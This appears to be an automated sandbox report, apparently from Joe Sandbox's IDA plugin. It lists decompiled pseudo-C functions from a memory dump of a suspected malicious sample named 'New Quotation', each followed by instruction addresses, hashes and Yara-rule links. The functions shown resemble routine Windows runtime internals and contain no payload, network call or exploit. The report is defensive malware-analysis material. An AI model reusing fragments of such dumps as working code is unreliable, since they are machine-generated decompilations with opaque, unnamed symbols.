				E1D818F40(0x1d8c63a0, 0, 0x234);
				 *((intOrPtr*)(_t28 + 0x294)) =  *((intOrPtr*)(_t28 + 0x294)) + 1;
				_v8 =  *((intOrPtr*)(_t28 + 0x48));
				 *((intOrPtr*)(_t28 + 0x48)) = _t34;
				 *((intOrPtr*)(_t28 + 0x290)) = _t17;
				E1D7DE740( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x1c)), __edi, __esi, __ebx);
				_t32 = _a8;
				_t23 = _v8;
				if(_t32 == 0) {
					if(_t23 != 0) {
						E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t23);
					}
				} else {
					 *_t32 = _t23;
				}
				return 0;
			}









                                                                                                                                                                                          0x1d84de55
                                                                                                                                                                                          0x1d84de5f
                                                                                                                                                                                          0x1d84de68
                                                                                                                                                                                          0x1d84de71
                                                                                                                                                                                          0x1d84de82
                                                                                                                                                                                          0x1d84de93
                                                                                                                                                                                          0x1d84de9e
                                                                                                                                                                                          0x1d84dea4
                                                                                                                                                                                          0x1d84dead
                                                                                                                                                                                          0x1d84deb0
                                                                                                                                                                                          0x1d84deb9
                                                                                                                                                                                          0x1d84debe
                                                                                                                                                                                          0x1d84dec1
                                                                                                                                                                                          0x1d84dec9
                                                                                                                                                                                          0x1d84ded1
                                                                                                                                                                                          0x1d84dedf
                                                                                                                                                                                          0x1d84dedf
                                                                                                                                                                                          0x1d84decb
                                                                                                                                                                                          0x1d84decb
                                                                                                                                                                                          0x1d84decb
                                                                                                                                                                                          0x1d84dee7

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 7fd571a306f01c39a4f9703e4a01484f4788ec448bc55d12ab92601bd77ed13e
                                                                                                                                                                                          • Instruction ID: b7b1889a2fed2b3a3dc4bf01313fe7d5303d2e48ac6c3d999c7e32e927e73c88
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fd571a306f01c39a4f9703e4a01484f4788ec448bc55d12ab92601bd77ed13e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2011ED36201644EFCB12DF18CC80F56BBB8FF44B94F2504A6FA058B662C338ED01CAA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D855CD0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D855CD0(void* __eflags, void* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				void* _t28;

				E1D806B6E(_a4,  &_v36,  &_v12,  &_v32,  &_v8,  &_v28,  &_v16,  &_v24,  &_v20);
				_t25 =  *0x1d8c5d78; // 0x0
				_t40 = _v20 + 0x14 + _v8 + _v12 + _v16;
				_t28 = E1D7E5D90(_v8 + _v12 + _v16,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x140000, _v20 + 0x14 + _v8 + _v12 + _v16);
				 *_a8 = _t28;
				if(_t28 != 0) {
					E1D8188C0(_t28, _a4, _t40);
					return 0;
				}
				return 0xc0000017;
			}













                                                                                                                                                                                          0x1d855cfb
                                                                                                                                                                                          0x1d855d0f
                                                                                                                                                                                          0x1d855d14
                                                                                                                                                                                          0x1d855d26
                                                                                                                                                                                          0x1d855d2e
                                                                                                                                                                                          0x1d855d32
                                                                                                                                                                                          0x1d855d40
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d855d48
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 85378f51cc78bb52952ebb8e517511aa179e2acd42845d867bcfafb974f9911d
                                                                                                                                                                                          • Instruction ID: 63451b90b7df7b8436df0d7290341f646d6a5cdda05446b0e2ea09190b859ced
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85378f51cc78bb52952ebb8e517511aa179e2acd42845d867bcfafb974f9911d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C11097790011DEBCB11DB94CC84DDF777CEF48254F054166A606E7210EA34AA55CBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D1FAA Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E1D7D1FAA(void* __ecx, void* __edx) {
				char* _t14;
				void* _t17;
				unsigned int _t21;
				signed int _t27;
				unsigned int _t29;

				_t17 = __ecx;
				_t29 =  *(__ecx + 0x8c);
				if(__edx == 0) {
					L3:
					_t27 = 0;
				} else {
					while(1) {
						_t27 = _t29 >> 1;
						if(_t27 == 0) {
							goto L3;
						}
						_t21 = _t29;
						asm("lock cmpxchg [edx], esi");
						_t29 = _t21;
						if(_t29 != _t21) {
							continue;
						} else {
							goto L4;
						}
						L13:
					}
					goto L3;
				}
				L4:
				E1D7FDB40(_t17 + 0x20,  ~_t27, 1);
				if(E1D7E3C40() != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t14 = 0x7ffe0386;
				}
				if( *_t14 != 0) {
					if(_t27 != 0) {
						return E1D8A4AE8( *((intOrPtr*)(_t17 + 0x5c)), _t17 + 0x78,  *((intOrPtr*)(_t17 + 0x30)),  *((intOrPtr*)(_t17 + 0x34)),  *((intOrPtr*)(_t17 + 0x3c)), _t27);
					}
				}
				return _t14;
				goto L13;
			}








                                                                                                                                                                                          0x1d7d1fad
                                                                                                                                                                                          0x1d7d1fb1
                                                                                                                                                                                          0x1d7d1fb9
                                                                                                                                                                                          0x1d7d1fcb
                                                                                                                                                                                          0x1d7d1fcb
                                                                                                                                                                                          0x1d7d1fbb
                                                                                                                                                                                          0x1d7d1fc1
                                                                                                                                                                                          0x1d7d1fc3
                                                                                                                                                                                          0x1d7d1fc5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82f9fd
                                                                                                                                                                                          0x1d82fa04
                                                                                                                                                                                          0x1d82fa08
                                                                                                                                                                                          0x1d82fa0c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82fa12
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82fa12
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82fa0c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d1fc1
                                                                                                                                                                                          0x1d7d1fcd
                                                                                                                                                                                          0x1d7d1fd6
                                                                                                                                                                                          0x1d7d1fe2
                                                                                                                                                                                          0x1d82fa20
                                                                                                                                                                                          0x1d7d1fe8
                                                                                                                                                                                          0x1d7d1fe8
                                                                                                                                                                                          0x1d7d1fe8
                                                                                                                                                                                          0x1d7d1ff0
                                                                                                                                                                                          0x1d82fa2c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82fa42
                                                                                                                                                                                          0x1d82fa2c
                                                                                                                                                                                          0x1d7d1ff9
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 705f67a75b8a464c4c5c494a2874e61430884ed23c255893ce333174fde43e10
                                                                                                                                                                                          • Instruction ID: 0a2c8dcb6d33b1e5d4bd53ef55cdc6cd87f0b5184468635ade9a36ab3b85e8ae
                                                                                                                                                                                          • Opcode Fuzzy Hash: 705f67a75b8a464c4c5c494a2874e61430884ed23c255893ce333174fde43e10
                                                                                                                                                                                          • Instruction Fuzzy Hash: 080164332006108BDB418E1EE8C0F5673AABFC4620F0682A6FD198F256EB70DC80D392
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CBFC0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7CBFC0(intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				char* _t12;
				signed int* _t13;
				void* _t19;
				signed int _t27;
				intOrPtr _t29;

				_t29 = _a4;
				_t27 = 0;
				_t12 = E1D807128(_t19, _t29, 0, 0);
				if(_t12 == 0) {
					L3:
					return _t12;
				}
				if(_a8 != 0) {
					_t13 = _t29 + 0xa8;
					_t27 =  *_t13;
					 *_t13 = 0;
				}
				_t12 = E1D7FDB40(_t29 + 0x20,  ~_t27, 1);
				if(_t27 != 0) {
					if(E1D7E3C40() == 0) {
						_t12 = 0x7ffe0386;
					} else {
						_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					}
					if( *_t12 == 0) {
						goto L3;
					}
					return E1D8A4AE8( *((intOrPtr*)(_t29 + 0x5c)), _t29 + 0x78, _t29 + 0x30,  *((intOrPtr*)(_t29 + 0x34)),  *((intOrPtr*)(_t29 + 0x3c)), _t27);
				} else {
					goto L3;
				}
			}









                                                                                                                                                                                          0x1d7cbfc6
                                                                                                                                                                                          0x1d7cbfcc
                                                                                                                                                                                          0x1d7cbfd1
                                                                                                                                                                                          0x1d7cbfd8
                                                                                                                                                                                          0x1d7cbffc
                                                                                                                                                                                          0x1d7cbffc
                                                                                                                                                                                          0x1d7cbffc
                                                                                                                                                                                          0x1d7cbfdd
                                                                                                                                                                                          0x1d82d358
                                                                                                                                                                                          0x1d82d35e
                                                                                                                                                                                          0x1d82d35e
                                                                                                                                                                                          0x1d82d35e
                                                                                                                                                                                          0x1d7cbfec
                                                                                                                                                                                          0x1d7cbff3
                                                                                                                                                                                          0x1d82d36c
                                                                                                                                                                                          0x1d82d37e
                                                                                                                                                                                          0x1d82d36e
                                                                                                                                                                                          0x1d82d377
                                                                                                                                                                                          0x1d82d377
                                                                                                                                                                                          0x1d82d386
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0af8a320b4d53ba6ca59b357e506e81477344c77024c577bbe1ae4a25d7dfec8
                                                                                                                                                                                          • Instruction ID: 3d936998d98a5f1bfdbb8fee0f61968aa1720cf243acfaaf8bff32915104d3da
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0af8a320b4d53ba6ca59b357e506e81477344c77024c577bbe1ae4a25d7dfec8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 26012832100B41AFD7228A6ED804EB777EDFFC1B60F41841AB6558B650EA70F541CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D88EFD3 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                          			E1D88EFD3(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x1d8cb370 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E1D818F40( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E1D7E3C40() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                                                                                          0x1d88efd3
                                                                                                                                                                                          0x1d88efd3
                                                                                                                                                                                          0x1d88efe2
                                                                                                                                                                                          0x1d88efec
                                                                                                                                                                                          0x1d88eff1
                                                                                                                                                                                          0x1d88eff3
                                                                                                                                                                                          0x1d88effe
                                                                                                                                                                                          0x1d88f004
                                                                                                                                                                                          0x1d88f00c
                                                                                                                                                                                          0x1d88f00f
                                                                                                                                                                                          0x1d88f012
                                                                                                                                                                                          0x1d88f01d
                                                                                                                                                                                          0x1d88f02f
                                                                                                                                                                                          0x1d88f01f
                                                                                                                                                                                          0x1d88f028
                                                                                                                                                                                          0x1d88f028
                                                                                                                                                                                          0x1d88f03a
                                                                                                                                                                                          0x1d88f03b
                                                                                                                                                                                          0x1d88f03d
                                                                                                                                                                                          0x1d88f042
                                                                                                                                                                                          0x1d88f055

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: df0ca319060680d9e3d400d86bb2eef8439383f61c7df296c0405f8730d82803
                                                                                                                                                                                          • Instruction ID: 0b49c9fc43257ea6b2240f5f63f2896bd4c5456d16b1375be8f4983a749b966b
                                                                                                                                                                                          • Opcode Fuzzy Hash: df0ca319060680d9e3d400d86bb2eef8439383f61c7df296c0405f8730d82803
                                                                                                                                                                                          • Instruction Fuzzy Hash: 99019E75A00248EFCB04DFA9D842FAEBBB8EF44744F014066BA00EF291D674EA05CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7EDF36 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7EDF36(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E1D7E3C40() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E1D850227(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                                                                                                                          0x1d7edf43
                                                                                                                                                                                          0x1d7edf45
                                                                                                                                                                                          0x1d7edf47
                                                                                                                                                                                          0x1d7edf4c
                                                                                                                                                                                          0x1d8290e9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8290f8
                                                                                                                                                                                          0x1d7edf57
                                                                                                                                                                                          0x1d7edf5a
                                                                                                                                                                                          0x1d829102
                                                                                                                                                                                          0x1d82910f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82911c
                                                                                                                                                                                          0x1d82912e
                                                                                                                                                                                          0x1d82911e
                                                                                                                                                                                          0x1d829127
                                                                                                                                                                                          0x1d829127
                                                                                                                                                                                          0x1d829136
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d829147
                                                                                                                                                                                          0x1d7edf63
                                                                                                                                                                                          0x1d7edf63
                                                                                                                                                                                          0x1d7edf63
                                                                                                                                                                                          0x1d7edf52
                                                                                                                                                                                          0x1d7edf52
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 838bce743b102303a3544e4f9f305518d06da8c51d6d4c822662159881bf861c
                                                                                                                                                                                          • Instruction ID: 890bbe0232a555bf2c7063cc6963c6998f9c95a6b57070cd9111f1944df7c725
                                                                                                                                                                                          • Opcode Fuzzy Hash: 838bce743b102303a3544e4f9f305518d06da8c51d6d4c822662159881bf861c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D018F72644584DFD313D75DD948F32B7ECFB44BA0F0540A2F928CBAA1E628DC80C262
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D85488F Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D85488F(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _t13;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr* _t19;
				signed int _t20;

				_t18 = __ecx;
				_t16 = __ecx;
				_v12 = __ecx;
				_t19 = 0x1d8c679c;
				_v8 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				do {
					if(_t16 != 0) {
						_t4 = _t19 - 4; // 0x1906a90
						_t13 =  *_t4;
						if(_t13 != 0) {
							_t17 = _v8;
							do {
								_t6 = _t13 + 4; // 0x0
								_t20 =  *_t6;
								E1D7E3BC0(_t17, 0, _t13);
								_t13 = _t20;
							} while (_t20 != 0);
							 *(_t19 - 4) =  *(_t19 - 4) & _t20;
							_t16 = _v12;
						}
						 *_t19 = 1;
					}
					E1D7E24D0(_t19);
					_t19 = _t19 - 8;
				} while (_t19 >= 0x1d8c6724);
				if(_t16 != 0) {
					 *0x1d8c5c80 = 1;
					 *0x1d8c6718 = 0x11;
				}
				return E1D7D52F0(_t18, 0x1d8c6718);
			}










                                                                                                                                                                                          0x1d85488f
                                                                                                                                                                                          0x1d85489f
                                                                                                                                                                                          0x1d8548a5
                                                                                                                                                                                          0x1d8548a8
                                                                                                                                                                                          0x1d8548ad
                                                                                                                                                                                          0x1d8548b0
                                                                                                                                                                                          0x1d8548b2
                                                                                                                                                                                          0x1d8548b4
                                                                                                                                                                                          0x1d8548b4
                                                                                                                                                                                          0x1d8548b9
                                                                                                                                                                                          0x1d8548bb
                                                                                                                                                                                          0x1d8548be
                                                                                                                                                                                          0x1d8548be
                                                                                                                                                                                          0x1d8548be
                                                                                                                                                                                          0x1d8548c5
                                                                                                                                                                                          0x1d8548ca
                                                                                                                                                                                          0x1d8548cc
                                                                                                                                                                                          0x1d8548d0
                                                                                                                                                                                          0x1d8548d3
                                                                                                                                                                                          0x1d8548d3
                                                                                                                                                                                          0x1d8548d6
                                                                                                                                                                                          0x1d8548d6
                                                                                                                                                                                          0x1d8548dd
                                                                                                                                                                                          0x1d8548e2
                                                                                                                                                                                          0x1d8548e5
                                                                                                                                                                                          0x1d8548ef
                                                                                                                                                                                          0x1d8548f1
                                                                                                                                                                                          0x1d8548fb
                                                                                                                                                                                          0x1d8548fb
                                                                                                                                                                                          0x1d854913

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ba04ecdc469efdebd271b7270b9c711ef07def9e456cb53cd7bd3a4ec260fc03
                                                                                                                                                                                          • Instruction ID: 2001a245f9259a7d4d40b5479bdd3c86022bf510b63a7426c6e8d8eba9f7ca11
                                                                                                                                                                                          • Opcode Fuzzy Hash: ba04ecdc469efdebd271b7270b9c711ef07def9e456cb53cd7bd3a4ec260fc03
                                                                                                                                                                                          • Instruction Fuzzy Hash: D301F2B2B00345EFDB108F8DD9C4BA9B7F8AB48764F0201B5EA0497212C7B0F90487A2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D88EEE7 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                          			E1D88EEE7(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				void* __edi;
				void* __esi;
				void* _t17;
				signed char* _t18;
				intOrPtr _t24;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				signed int _t36;

				_t29 = __edx;
				_t24 = __ebx;
				_v8 =  *0x1d8cb370 ^ _t36;
				_t31 = __edx;
				_t34 = __ecx;
				E1D818F40( &_v52, 0, 0x2c);
				_v20 = _t34;
				_v46 = 0x1039;
				_v16 = _t31;
				_v12 = _a4;
				_t17 = E1D7E3C40();
				_t32 = _t30;
				_t35 = _t33;
				if(_t17 == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t24, _v8 ^ _t36, _t29, _t32, _t35);
			}





















                                                                                                                                                                                          0x1d88eee7
                                                                                                                                                                                          0x1d88eee7
                                                                                                                                                                                          0x1d88eef6
                                                                                                                                                                                          0x1d88ef00
                                                                                                                                                                                          0x1d88ef05
                                                                                                                                                                                          0x1d88ef07
                                                                                                                                                                                          0x1d88ef11
                                                                                                                                                                                          0x1d88ef17
                                                                                                                                                                                          0x1d88ef1e
                                                                                                                                                                                          0x1d88ef21
                                                                                                                                                                                          0x1d88ef24
                                                                                                                                                                                          0x1d88ef29
                                                                                                                                                                                          0x1d88ef2a
                                                                                                                                                                                          0x1d88ef2d
                                                                                                                                                                                          0x1d88ef3f
                                                                                                                                                                                          0x1d88ef2f
                                                                                                                                                                                          0x1d88ef38
                                                                                                                                                                                          0x1d88ef38
                                                                                                                                                                                          0x1d88ef4a
                                                                                                                                                                                          0x1d88ef4b
                                                                                                                                                                                          0x1d88ef4d
                                                                                                                                                                                          0x1d88ef52
                                                                                                                                                                                          0x1d88ef63

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: dd7be8680c7b20fe9f368b064b820283b3b3261289c908b410fee9d2a7ef728f
                                                                                                                                                                                          • Instruction ID: 2563312cdef15bcc175760441a97694ee9d820d3fc6b17dc53336f31358e49cb
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd7be8680c7b20fe9f368b064b820283b3b3261289c908b410fee9d2a7ef728f
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2018F75A10218EFDB10DBA9D845FAEBBB8EF84704F0140AAF500EB291DA74E905C795
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D88D947 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                                          			E1D88D947(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x1d8cb370 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E1D818F40( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x265;
				if(E1D7E3C40() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                                                                          0x1d88d947
                                                                                                                                                                                          0x1d88d947
                                                                                                                                                                                          0x1d88d956
                                                                                                                                                                                          0x1d88d960
